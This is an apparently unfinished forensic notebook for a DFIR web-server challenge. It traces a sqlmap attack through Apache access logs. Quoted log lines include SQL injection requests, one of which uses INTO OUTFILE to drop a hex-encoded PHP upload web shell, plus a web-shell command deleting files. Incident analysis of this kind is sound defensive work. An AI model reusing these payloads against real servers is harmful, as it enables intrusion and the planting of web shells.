# Web Server Case : Ali Hadi

**Source:** https://www.ashemery.com/dfir.html

**To successfully solve this challenge, a report with answers to the tasks below is required:**

    * What type of attacks has been performed on the box?
    * How many users has the attacker(s) added to the box, and how were they added?
    * What leftovers (files, tools, info, etc) did the attacker(s) leave behind? (assume our team arrived in time and the attacker(s) couldn’t clean and cover their tracks)
    * What software has been installed on the box, and were they installed by the attacker(s) or not?
    * Using memory forensics, can you identify the type of shellcode used?
    * What is the timeline analysis for all events that happened on the box?
    * What is your hypothesis for the case, and what is your approach in solving it?
    * Is there anything else you would like to add?

**Bonus Question:** what are the directories and files, that have been added by the attacker(s)? List all with proof.

**Evidences:**
* System Image: s4a-challenge4
* System Memory: memdump.mem

# 1º Extract artifacts from evidences

With FTK Imager mount the s4a-challenge4 evidence to see the filesystem and identify what is a windows webserver (LAMP).

Get the logs of webserver from c:\xampp\apache\logs

In [4]:
!cat logs/install.log | head -7

Installing Apache HTTP Server 2.x with
 DomainName    = example.com
 ServerName    = www.example.com
 ServerAdmin   = admin@example.com
 ServerPort    = 80
 ServerSslPort = 443
 ServerRoot    = c:/Apache24


In [5]:
!cat logs/access.log | awk '{print $1}' | sort | uniq -c | sort -nr

   4398 192.168.56.102
    461 10.20.0.72
    316 10.20.0.54
    302 10.20.0.65
    301 10.20.0.61
    301 10.20.0.58
    300 10.20.0.68
    300 10.20.0.66
    300 10.20.0.63
    300 10.20.0.62
    139 10.20.0.75
    139 10.20.0.71
    124 ::1
     26 10.20.0.90
      9 10.20.0.109


In [6]:
!grep "192.168.56.102" logs/access.log >> 192-168-56-102-access_log.log

In [11]:
!cat 192-168-56-102-access_log.log | awk -F\" '{print $6}' | sort | uniq -c | sort -nr

   3621 sqlmap/1.0-dev-nongit-20150902 (http://sqlmap.org)
    510 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    215 Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
     28 Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
     22 Mozilla/4.0 (compatible; MSIE 6.0;)
      6 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)
      2 Python-urllib/2.7


## Exploit Public-Facing Application (T1190)

In [20]:
!cat 192-168-56-102-access_log.log | grep "sqlmap/1.0-dev-nongit-20150902" | awk -F\" '{print $2}' | tail -n10
# files has being created and deleted...

GET /tmpbiwuc.php?cmd=del%20%2FF%20%2FQ%20%5Cxampp%5Chtdocs%5Ctmpbiwuc.php HTTP/1.1
GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1
GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit&ZSce%3D8435%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
GET /dvwa/vulnerabilities/sqli/?id=2%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27%2Fxampp%2Fhtdocs%2Ftmpudvfh.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225

In [ ]:
# XSS Vulnerabilities

In [ ]:
# upload vulnerabilities (php web shells)